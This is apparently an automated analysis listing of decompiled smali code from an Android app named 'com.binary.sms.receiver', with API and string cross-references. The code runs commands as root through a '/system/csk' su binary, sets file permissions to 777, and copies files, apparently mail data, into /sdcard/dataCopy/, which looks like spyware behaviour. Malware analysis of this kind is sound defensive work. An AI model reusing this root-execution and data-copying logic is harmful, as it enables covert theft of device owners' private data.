    12invoke-direct {v5, v6}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    14invoke-virtual {v5}, Ljava/io/File;->exists()Z
    15move-result v5
    16if-nez v5, :cond_15
    18const-string v5, "runProcess my su does not exists. returning"
    20invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    21cond_13: monitor-exit p0
    22return-void
    23cond_15: iget v5, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    24add-int/lit8 v5, v5, 0x1
    25iput v5, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    26try_end_1b: const/4 v2, 0x0
    27goto_1c: const/4 v5, 0x5
    28if-ge v2, v5, :cond_13
    29const/4 v3, 0x0
    30try_start_20: new-instance v5, Ljava/lang/StringBuilder;
    32const-string v6, "filePath-"
    34invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    35iget v6, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    37invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    38move-result-object v5
    40const-string v6, ": "
    42invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    43move-result-object v5
    45invoke-virtual {v5, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    46move-result-object v5
    48invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    49move-result-object v5
    51invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    52new-instance v5, Ljava/lang/StringBuilder;
    54const-string v6, "export LD_LIBRARY_PATH=/vendor/lib:/system/lib; chmod 777 "
    56invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    58invoke-virtual {v5, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    59move-result-object v5
    61invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    62move-result-object v0
    63new-instance v5, Ljava/lang/StringBuilder;
    65const-string v6, "command: "
    67invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    69invoke-virtual {v5, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    70move-result-object v5
    72invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    73move-result-object v5
    75invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    76new-instance v5, Ljava/lang/StringBuilder;
    78const-string v6, "runProcess start (synchronized)"
    80invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    82invoke-virtual {v5, v2}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    83move-result-object v5
    85const-string v6, ". command: "
    87invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    88move-result-object v5
    90invoke-virtual {v5, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    91move-result-object v5
    93invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    94move-result-object v5
    96invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    98invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    99move-result-object v5
    100const/4 v6, 0x2
    101new-array v6, v6, [Ljava/lang/String;
    102const/4 v7, 0x0
    104const-string v8, "/system/csk"
    105aput-object v8, v6, v7
    106const/4 v7, 0x1
    107new-instance v8, Ljava/lang/StringBuilder;
    109const-string v9, "export LD_LIBRARY_PATH=/vendor/lib:/system/lib; "
    111invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    113invoke-virtual {v8, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    114move-result-object v8
    116invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    117move-result-object v8
    118aput-object v8, v6, v7
    120invoke-virtual {v5, v6}, Ljava/lang/Runtime;->exec([Ljava/lang/String;)Ljava/lang/Process;
    121try_end_9c: move-result-object v3
    122const/4 v4, -0x1
    123const v5, 0x15f90
    124try_start_a1:
    125invoke-static {v3, v5}, Lcom/binary/sms/receiver/SkeletonActivity;->WaitForTimeout(Ljava/lang/Process;I)I
    126move-result v4
    127if-nez v4, :cond_cd
    128new-instance v5, Ljava/lang/StringBuilder;
    130const-string v6, "runProcess cmd="
    132invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    134invoke-virtual {v5, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    135move-result-object v5
    137const-string v6, " success: "
    139invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    140move-result-object v5
    142invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    143move-result-object v5
    145invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    146move-result-object v5
    148invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    149goto_c3: if-eqz v3, :cond_13
    150try_start_c5:
    151invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    152try_end_c8: goto/16 :goto_13
    153catch_ca: move-exception v5
    154goto/16 :goto_13
    155cond_cd: new-instance v5, Ljava/lang/StringBuilder;
    157const-string v6, "runProcess cmd="
    159invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    161invoke-virtual {v5, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    162move-result-object v5
    164const-string v6, " fail: "
    166invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    167move-result-object v5
    169invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    170move-result-object v5
    172invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    173move-result-object v5
    175invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    176try_end_e9: goto/16 :goto_c3
    177catch_ea: move-exception v1
    178try_start_eb: new-instance v5, Ljava/lang/StringBuilder;
    180const-string v6, "runProcess cmd="
    182invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    184invoke-virtual {v5, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    185move-result-object v5
    187const-string v6, " timeout="
    189invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    190move-result-object v5
    192invoke-virtual {v1}, Ljava/util/concurrent/TimeoutException;->getMessage()Ljava/lang/String;
    193move-result-object v6
    195invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    196move-result-object v5
    198invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    199move-result-object v5
    201invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    202try_end_10b: const/4 v3, 0x0
    203if-eqz v3, :cond_111
    204try_start_10e:
    205invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    206try_end_111: add-int/lit8 v2, v2, 0x1
    207goto/16 :goto_1c
    208catch_115: move-exception v1
    209try_start_116: new-instance v5, Ljava/lang/StringBuilder;
    211const-string v6, "runProcess Exception- "
    213invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    215invoke-virtual {v1}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    216move-result-object v6
    218invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    219move-result-object v5
    221invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    222move-result-object v5
    224invoke-static {v5, v1}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    225try_end_12c: if-eqz v3, :cond_13
    226try_start_12e:
    227invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    228try_end_131: goto/16 :goto_13
    229catch_133: move-exception v5
    230goto/16 :goto_13
    231catch_136: move-exception v1
    232try_start_137: new-instance v5, Ljava/lang/StringBuilder;
    234const-string v6, "runProcess Throwable- "
    236invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    238invoke-virtual {v1}, Ljava/lang/Throwable;->getMessage()Ljava/lang/String;
    239move-result-object v6
    241invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    242move-result-object v5
    244invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    245move-result-object v5
    247invoke-static {v5, v1}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    248try_end_14d: if-eqz v3, :cond_13
    249try_start_14f:
    250invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    251try_end_152: goto/16 :goto_13
    252catch_154: move-exception v5
    253goto/16 :goto_13
    254catchall_157: move-exception v5
    255if-eqz v3, :cond_15d
    256try_start_15a:
    257invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    258cond_15d: throw v5
    259catchall_15e: move-exception v5
    260monitor-exit p0
    261throw v5
    262catch_161: move-exception v6
    263goto/16 :goto_15d
    264catch_163: move-exception v5
    265goto/16 :goto_111
    Cross References
    APIs
    • java.lang.Runtime.getRuntime
    • java.lang.Runtime.exec
    • java.lang.Process.getOutputStream
    • java.io.DataOutputStream.<init>
    • java.io.DataOutputStream.writeBytes
    • java.io.DataOutputStream.flush
    • java.lang.Thread.currentThread
    • java.lang.Thread.sleep
    • java.lang.Process.waitFor
    • android.os.Message.obtain
    • java.io.DataOutputStream.close
    • java.lang.Process.destroy
    • com.binary.sms.receiver.SkeletonActivity.access$0
    • android.widget.EditText.setText
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.String.valueOf
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.DataOutputStream.writeBytes
    • java.io.DataOutputStream.flush
    • android.os.Message.obtain
    • android.os.Message.obtain
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.DataOutputStream.close
    • java.lang.Process.destroy
    • com.binary.sms.receiver.SkeletonActivity.access$0
    • android.widget.EditText.setText
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.DataOutputStream.close
    • java.lang.Process.destroy
    • com.binary.sms.receiver.SkeletonActivity.access$0
    • android.widget.EditText.setText
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • exit\n
    • systemCall Succesfule
    • command:
    • \n
    • systemCall Exception
    • systemCall finaly
    Position Instruction Meta Information
    0.param p1, "suComand" # Ljava/lang/String;
    1.param p2, "commands" # [Ljava/lang/String;
    2.prologue
    3const/4 v8, 0x0
    4const/4 v3, 0x0
    5const/4 v1, 0x1
    6const/4 v6, 0x0
    7const/4 v4, 0x0
    8try_start_5:
    9invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    10move-result-object v9
    12invoke-virtual {v9, p1}, Ljava/lang/Runtime;->exec(Ljava/lang/String;)Ljava/lang/Process;
    13move-result-object v6
    14new-instance v5, Ljava/io/DataOutputStream;
    16invoke-virtual {v6}, Ljava/lang/Process;->getOutputStream()Ljava/io/OutputStream;
    17move-result-object v9
    19invoke-direct {v5, v9}, Ljava/io/DataOutputStream;-><init>(Ljava/io/OutputStream;)V
    20try_end_16: if-eqz p2, :cond_1d
    21try_start_18: array-length v9, p2
    22move v2, v1
    23goto_1a: if-lt v8, v9, :cond_55
    24move v1, v2
    25cond_1d:
    26const-string v8, "exit\n"
    28invoke-virtual {v5, v8}, Ljava/io/DataOutputStream;->writeBytes(Ljava/lang/String;)V
    30invoke-virtual {v5}, Ljava/io/DataOutputStream;->flush()V
    32invoke-static {}, Ljava/lang/Thread;->currentThread()Ljava/lang/Thread;
    33const-wide/16 v8, 0x1f4
    35invoke-static {v8, v9}, Ljava/lang/Thread;->sleep(J)V
    37invoke-virtual {v6}, Ljava/lang/Process;->waitFor()I
    39invoke-static {}, Landroid/os/Message;->obtain()Landroid/os/Message;
    40move-result-object v3
    41const/4 v8, 0x0
    42iput v8, v3, Landroid/os/Message;->arg1:I
    43const/4 v8, 0x0
    44iput v8, v3, Landroid/os/Message;->arg2:I
    46const-string v8, "systemCall Succesfule"
    48invoke-static {v8}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    49try_end_3f: if-eqz v5, :cond_44
    50try_start_41:
    51invoke-virtual {v5}, Ljava/io/DataOutputStream;->close()V
    52cond_44:
    53invoke-virtual {v6}, Ljava/lang/Process;->destroy()V
    55iget-object v8, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    57invoke-static {v8}, Lcom/binary/sms/receiver/SkeletonActivity;->access$0(Lcom/binary/sms/receiver/SkeletonActivity;)Landroid/widget/EditText;
    58move-result-object v8
    59const/4 v9, 0x0
    60aget-object v9, p2, v9
    62invoke-virtual {v8, v9}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    63try_end_53: move-object v4, v5
    64goto_54: return-void
    65cond_55: aget-object v7, p2, v8
    66new-instance v10, Ljava/lang/StringBuilder;
    68const-string v11, "command: "
    70invoke-direct {v10, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    72invoke-virtual {v10, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    73move-result-object v10
    75invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    76move-result-object v10
    78invoke-static {v10}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    79new-instance v10, Ljava/lang/StringBuilder;
    81invoke-static {v7}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    82move-result-object v11
    84invoke-direct {v10, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    86const-string v11, "\n"
    88invoke-virtual {v10, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    89move-result-object v10
    91invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    92move-result-object v10
    94invoke-virtual {v5, v10}, Ljava/io/DataOutputStream;->writeBytes(Ljava/lang/String;)V
    96invoke-virtual {v5}, Ljava/io/DataOutputStream;->flush()V
    98invoke-static {}, Landroid/os/Message;->obtain()Landroid/os/Message;
    99try_end_85: move-result-object v3
    100add-int/lit8 v1, v2, 0x1
    101try_start_88: iput v2, v3, Landroid/os/Message;->arg1:I
    102const/4 v10, -0x1
    103iput v10, v3, Landroid/os/Message;->arg2:I
    104try_end_8d: add-int/lit8 v8, v8, 0x1
    105move v2, v1
    106goto/16 :goto_1a
    107catch_91: move-exception v0
    108try_start_92:
    109invoke-static {}, Landroid/os/Message;->obtain()Landroid/os/Message;
    110move-result-object v3
    111const/4 v8, 0x1
    112iput v8, v3, Landroid/os/Message;->arg1:I
    113const/4 v8, 0x0
    114iput v8, v3, Landroid/os/Message;->arg2:I
    115new-instance v8, Ljava/lang/StringBuilder;
    117const-string v9, "systemCall Exception"
    119invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    121invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    122move-result-object v9
    124invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    125move-result-object v8
    127invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    128move-result-object v8
    130invoke-static {v8, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    131try_end_b2: if-eqz v4, :cond_b7
    132try_start_b4:
    133invoke-virtual {v4}, Ljava/io/DataOutputStream;->close()V
    134cond_b7:
    135invoke-virtual {v6}, Ljava/lang/Process;->destroy()V
    137iget-object v8, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    139invoke-static {v8}, Lcom/binary/sms/receiver/SkeletonActivity;->access$0(Lcom/binary/sms/receiver/SkeletonActivity;)Landroid/widget/EditText;
    140move-result-object v8
    141const/4 v9, 0x0
    142aget-object v9, p2, v9
    144invoke-virtual {v8, v9}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    145try_end_c6: goto/16 :goto_54
    146catch_c7: move-exception v0
    147new-instance v8, Ljava/lang/StringBuilder;
    149const-string v9, "systemCall finaly"
    151invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    153invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    154move-result-object v9
    156invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    157move-result-object v8
    159invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    160move-result-object v8
    162invoke-static {v8, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    163goto/16 :goto_54
    164catchall_e0: move-exception v8
    165goto_e1: if-eqz v4, :cond_e6
    166try_start_e3:
    167invoke-virtual {v4}, Ljava/io/DataOutputStream;->close()V
    168cond_e6:
    169invoke-virtual {v6}, Ljava/lang/Process;->destroy()V
    171iget-object v9, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    173invoke-static {v9}, Lcom/binary/sms/receiver/SkeletonActivity;->access$0(Lcom/binary/sms/receiver/SkeletonActivity;)Landroid/widget/EditText;
    174move-result-object v9
    175const/4 v10, 0x0
    176aget-object v10, p2, v10
    178invoke-virtual {v9, v10}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    179goto_f5: throw v8
    180catch_f6: move-exception v0
    181new-instance v9, Ljava/lang/StringBuilder;
    183const-string v10, "systemCall finaly"
    185invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    187invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    188move-result-object v10
    190invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    191move-result-object v9
    193invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    194move-result-object v9
    196invoke-static {v9, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    197goto/16 :goto_f5
    198catch_10e: move-exception v0
    199new-instance v8, Ljava/lang/StringBuilder;
    201const-string v9, "systemCall finaly"
    203invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    205invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    206move-result-object v9
    208invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    209move-result-object v8
    211invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    212move-result-object v8
    214invoke-static {v8, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    215goto/16 :goto_53
    216catchall_127: move-exception v8
    217move-object v4, v5
    218goto/16 :goto_e1
    219catchall_12a: move-exception v8
    220move-object v4, v5
    221move v1, v2
    222goto/16 :goto_e1
    223catch_12e: move-exception v0
    224move-object v4, v5
    225goto/16 :goto_92
    226catch_132: move-exception v0
    227move-object v4, v5
    228move v1, v2
    229goto/16 :goto_92
    APIs
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • com.binary.sms.receiver.SkeletonActivity.suCommand:Ljava/lang/String
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.<init>
    • java.io.File.exists
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • com.binary.sms.receiver.SkeletonActivity.access$1
    • com.binary.sms.receiver.SkeletonActivity.access$2
    • android.os.Environment.getExternalStorageDirectory
    • java.io.File.exists
    • android.os.Environment.getExternalStorageDirectory
    • java.io.File.getAbsolutePath
    • java.lang.String.valueOf
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.<init>
    • java.io.File.exists
    • java.io.File.mkdirs
    • java.io.File.<init>
    • java.lang.String.valueOf
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • com.binary.sms.receiver.SkeletonActivity.access$3
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.<init>
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • copy4 root folder:
    • suCommand:
    • file not exist:
    • /sdcard/
    • /dataCopy/
    • destBaseFolder:
    • File exist:
    • readMails:
    • /sdcard/dataCopy/
    Position Instruction Meta Information
    0.prologue
    1try_start_0: new-instance v4, Ljava/lang/StringBuilder;
    3const-string v5, "copy4 root folder: "
    5invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    7iget-object v5, p0, Lcom/binary/sms/receiver/SkeletonActivity$6;->val$source:Ljava/lang/String;
    9invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    10move-result-object v4
    12invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    13move-result-object v4
    15invoke-static {v4}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    16new-instance v4, Ljava/lang/StringBuilder;
    18const-string v5, "suCommand: "
    20invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    22sget-object v5, Lcom/binary/sms/receiver/SkeletonActivity;->suCommand:Ljava/lang/String;
    24invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    25move-result-object v4
    27invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    28move-result-object v4
    30invoke-static {v4}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    31new-instance v2, Ljava/io/File;
    33iget-object v4, p0, Lcom/binary/sms/receiver/SkeletonActivity$6;->val$source:Ljava/lang/String;
    35invoke-direct {v2, v4}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    37invoke-virtual {v2}, Ljava/io/File;->exists()Z
    38move-result v4
    39if-nez v4, :cond_c8
    40new-instance v4, Ljava/lang/StringBuilder;
    42const-string v5, "file not exist: "
    44invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    46invoke-virtual {v2}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    47move-result-object v5
    49invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    50move-result-object v4
    52invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    53move-result-object v4
    55invoke-static {v4}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    56goto_4b:
    57iget-object v4, p0, Lcom/binary/sms/receiver/SkeletonActivity$6;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    58const/4 v5, 0x0
    60invoke-static {v4, v5}, Lcom/binary/sms/receiver/SkeletonActivity;->access$1(Lcom/binary/sms/receiver/SkeletonActivity;I)V
    62iget-object v4, p0, Lcom/binary/sms/receiver/SkeletonActivity$6;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    64invoke-static {v4, v2}, Lcom/binary/sms/receiver/SkeletonActivity;->access$2(Lcom/binary/sms/receiver/SkeletonActivity;Ljava/io/File;)V
    66const-string v0, "/sdcard/"
    68invoke-static {}, Landroid/os/Environment;->getExternalStorageDirectory()Ljava/io/File;
    69move-result-object v4
    71invoke-virtual {v4}, Ljava/io/File;->exists()Z
    72move-result v4
    73if-eqz v4, :cond_f8
    74new-instance v4, Ljava/lang/StringBuilder;
    76invoke-static {}, Landroid/os/Environment;->getExternalStorageDirectory()Ljava/io/File;
    77move-result-object v5
    79invoke-virtual {v5}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    80move-result-object v5
    82invoke-static {v5}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    83move-result-object v5
    85invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    87const-string v5, "/dataCopy/"
    89invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    90move-result-object v4
    92invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    93move-result-object v0
    94goto_7d: new-instance v4, Ljava/lang/StringBuilder;
    96const-string v5, "destBaseFolder: "
    98invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    100invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    101move-result-object v4
    103invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    104move-result-object v4
    106invoke-static {v4}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    107new-instance v3, Ljava/io/File;
    109invoke-direct {v3, v0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    111invoke-virtual {v3}, Ljava/io/File;->exists()Z
    112move-result v4
    113if-nez v4, :cond_9d
    115invoke-virtual {v3}, Ljava/io/File;->mkdirs()Z
    116cond_9d: new-instance v4, Ljava/io/File;
    118iget-object v5, p0, Lcom/binary/sms/receiver/SkeletonActivity$6;->val$source:Ljava/lang/String;
    120invoke-direct {v4, v5}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    121new-instance v5, Ljava/io/File;
    122new-instance v6, Ljava/lang/StringBuilder;
    124invoke-static {v0}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    125move-result-object v7
    127invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    129iget-object v7, p0, Lcom/binary/sms/receiver/SkeletonActivity$6;->val$source:Ljava/lang/String;
    131invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    132move-result-object v6
    134invoke-static {}, Lcom/binary/sms/receiver/SkeletonActivity;->access$3()Ljava/lang/String;
    135move-result-object v7
    137invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    138move-result-object v6
    140invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    141move-result-object v6
    143invoke-direct {v5, v6}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    145invoke-static {v4, v5}, Lcom/binary/sms/receiver/SystemUtils;->copyFiles(Ljava/io/File;Ljava/io/File;)V
    146goto_c7: return-void
    147cond_c8: new-instance v4, Ljava/lang/StringBuilder;
    149const-string v5, "File exist: "
    151invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    153invoke-virtual {v2}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    154move-result-object v5
    156invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    157move-result-object v4
    159invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    160move-result-object v4
    162invoke-static {v4}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    163try_end_de: goto/16 :goto_4b
    164catch_e0: move-exception v1
    165new-instance v4, Ljava/lang/StringBuilder;
    167const-string v5, "readMails: "
    169invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
